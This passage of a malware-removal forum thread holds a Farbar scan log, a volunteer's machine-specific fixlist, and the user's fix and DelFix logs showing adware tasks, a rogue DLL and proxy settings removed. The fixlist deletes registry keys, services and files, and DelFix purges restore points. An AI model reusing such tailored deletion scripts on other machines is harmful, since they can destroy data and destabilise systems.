Task: {534DD19A-C485-4F2C-8C31-A3D51C2B3CFD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
Task: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {71519836-8433-4BC1-A669-7BFFA4D8575A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
Task: {A27C9E40-6522-4874-B404-6587317BB031} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTION
Task: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTION
Task: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTION
Task: {FE1E3EA7-3A55-42D9-B9F4-A40D5FDEA276} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-01-26] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2014-11-23 21:08 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-11-23 21:08 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-11-23 21:08 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2012-01-10 22:12 - 2012-01-10 22:12 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3179565126-1180787063-359821708-500 - Administrator - Disabled)
Guest (S-1-5-21-3179565126-1180787063-359821708-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3179565126-1180787063-359821708-1002 - Limited - Enabled)
User (S-1-5-21-3179565126-1180787063-359821708-1000 - Administrator - Enabled) => C:\Users\User

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (01/24/2015 05:17:00 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {989c0791-8944-4af3-9e28-21583bc66cc7}

Error: (01/23/2015 00:59:11 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2328

Start Time: 01d0365772617e5f

Termination Time: 1607

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 02:30:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc292
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x119a4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 01:14:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x525b84d1
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0xcc44
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 10:01:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc959
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x3a14
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 09:04:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b8
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x17a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 08:10:52 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 3880

Start Time: 01d035c7218aa0dd

Termination Time: 919

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 07:29:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb9
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x292c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 07:25:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc100
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x29bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/21/2015 09:10:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcb52
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x3a2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

System errors:
=============
Error: (01/25/2015 11:41:11 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/25/2015 11:41:10 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 11:43:55 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.

Error: (01/24/2015 11:41:32 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.

Error: (01/24/2015 11:34:01 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.

Error: (01/24/2015 11:15:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 11:14:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Spybot-S&D 2 Scanner Service service failed to start due to the following error:
%%1053

Error: (01/24/2015 11:14:38 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Spybot-S&D 2 Scanner Service service to connect.

Error: (01/24/2015 11:14:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 11:14:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 560 @ 2.67GHz
Percentage of memory in use: 37%
Total physical RAM: 3509.86 MB
Available physical RAM: 2205.87 MB
Total Pagefile: 7018.01 MB
Available Pagefile: 5159.55 MB
Total Virtual: 2047.88 MB
Available Virtual: 1908.47 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.94 GB) (Free:200.4 GB) NTFS
Drive d: (RCT3) (CDROM) (Total:0.67 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: B3AF73EC)
Partition 1: (Active) - (Size=157 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Link to post
Share on other sites

Hi,

I am sorry, I've been travelling for more than 30h lately and wasn't able to answer in the time manner.

FRST.gif Fix with Farbar Recovery Scan Tool

icon_exclaim.gif This fix was created for this user for use on that particular machine. icon_exclaim.gif

icon_exclaim.gif Running it on another one may cause damage and render the system unstable. icon_exclaim.gif

Press the WindowsKey.png + R on your keyboard at the same time. Type Notepad and click OK.

  • Copy the entire content of the codebox below and paste into the Notepad document:

    startCreateRestorePoint:CloseProcesses:C:\Users\User\AppData\Roaming\dkpxfv.dllTask: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTIONTask: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTIONTask: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTIONTask: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTIONAlternateDataStreams: C:\ProgramData\TEMP:373E1720C:\Users\User\AppData\Roaming\qkmrs.dllS3 catchme; \??\C:\Users\User\AppData\Local\Temp\catchme.sys [X]HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTIONHKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTIONProxyServer: [S-1-5-21-3179565126-1180787063-359821708-1000] => http=127.0.0.1:49329;https=127.0.0.1:49329CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTIONEmptyTemp:end
  • Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.

    > XP users click run after receipt of Windows Security Warning - Open File.

    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.

  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please include it in your reply.
Link to post
Share on other sites

No problem, Radek.  We all have things to do.  I'm just happy someone is helping me with this problem! 

 

I followed your instructions and here is my fixlog file:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 28-01-2015 01
Ran by User at 2015-01-28 18:24:23 Run:1
Running from C:\Users\User\Desktop\Malware stuff
Loaded Profiles: User (Available profiles: User)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\Users\User\AppData\Roaming\dkpxfv.dll
Task: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTION
Task: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTION
Task: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTION
Task: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
C:\Users\User\AppData\Roaming\qkmrs.dll
S3 catchme; \??\C:\Users\User\AppData\Local\Temp\catchme.sys [X]
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [s-1-5-21-3179565126-1180787063-359821708-1000] => http=127.0.0.1:49329;https=127.0.0.1:49329
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
EmptyTemp:
end
*****************

Restore point was successfully created.
Processes closed successfully.
"C:\Users\User\AppData\Roaming\dkpxfv.dll" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimizer Pro Schedule" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BE538E25-6810-47D7-9746-96E8507E6CDE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BE538E25-6810-47D7-9746-96E8507E6CDE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BrowserSafeguard" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E919B31C-4400-4B2E-8926-FAA405BBA3E3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E919B31C-4400-4B2E-8926-FAA405BBA3E3}" => Key deleted successfully.
C:\Windows\System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BrowserSafeguard Update Task" => Key deleted successfully.
C:\ProgramData\TEMP => ":373E1720" ADS removed successfully.
C:\Users\User\AppData\Roaming\qkmrs.dll => Moved successfully.
catchme => Service deleted successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value deleted successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
EmptyTemp: => Removed 1.4 GB temporary data.

The system needed a reboot.

==== End of Fixlog 18:32:20 ====

Link to post
Share on other sites

Radek, my system is running *much* better I can tell!   I appreciate all the advice and direction you provided.

 

I've been noticing that my CPU usage is very low...most of the time at 0% and my memory usage is usually around 35%.

 

I did have a problem this morning where my cpu was jumping all around and never got below 50% with the memory usage around 80%.  It looked like I had an Iexplorer process hogging up everything.  I restarted my system and everything went back to normal.  (0% cpu and 35% memory).

 

I ran malwarebytes free and it found nothing. 

 

Thanks!!!

Link to post
Share on other sites

Hi and sorry for thre delay, I bame it on the jetlag.

51a5ce45263de-delfix.png Clean with DelFix

Please download DelFix by Xplode and save it to your desktop.

  • Right-click on 51a5ce45263de-delfix.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Ensure that Remove disinfection tools, Purge system restore and Reset system settings are checked.
  • Push Run.
  • When finished, it will display a notepad report.
Include it for my review.

Please also manually reboot your machine after posting your logfile.

Link to post
Share on other sites

No problem Radek,

Here is my Log file:

 

# DelFix v10.8 - Logfile created 04/02/2015 at 07:32:04
# Updated 29/07/2014 by Xplode
# Username : User - USER-PC
# Operating System : Windows 7 Professional Service Pack 1 (32 bits)

~ Removing disinfection tools ...

Deleted : C:\Qoobox
Deleted : C:\FRST
Deleted : C:\ComboFix.txt
Deleted : C:\TDSSKiller.3.0.0.44_01.02.2015_12.10.32_log.txt
Deleted : C:\TDSSKiller.3.0.0.44_24.01.2015_13.11.57_log.txt
Deleted : C:\Windows\grep.exe
Deleted : C:\Windows\PEV.exe
Deleted : C:\Windows\NIRCMD.exe
Deleted : C:\Windows\MBR.exe
Deleted : C:\Windows\SED.exe
Deleted : C:\Windows\SWREG.exe
Deleted : C:\Windows\SWSC.exe
Deleted : C:\Windows\SWXCACLS.exe
Deleted : C:\Windows\Zip.exe
Deleted : HKLM\SOFTWARE\Swearware
Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\combofix.exe

~ Cleaning system restore ...

Deleted : RP #188 [Configured PowerDVD | 01/24/2015 23:17:02]
Deleted : RP #190 [Revo Uninstaller's restore point - Battle.net | 01/24/2015 23:21:57]
Deleted : RP #191 [Windows Update | 01/27/2015 04:33:27]
Deleted : RP #193 [Restore Point Created by FRST | 01/29/2015 00:24:27]
Deleted : RP #194 [installed AVG 2015 | 02/04/2015 04:20:19]

New restore point created !

~ Resetting system settings ... OK

########## - EOF - ##########

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.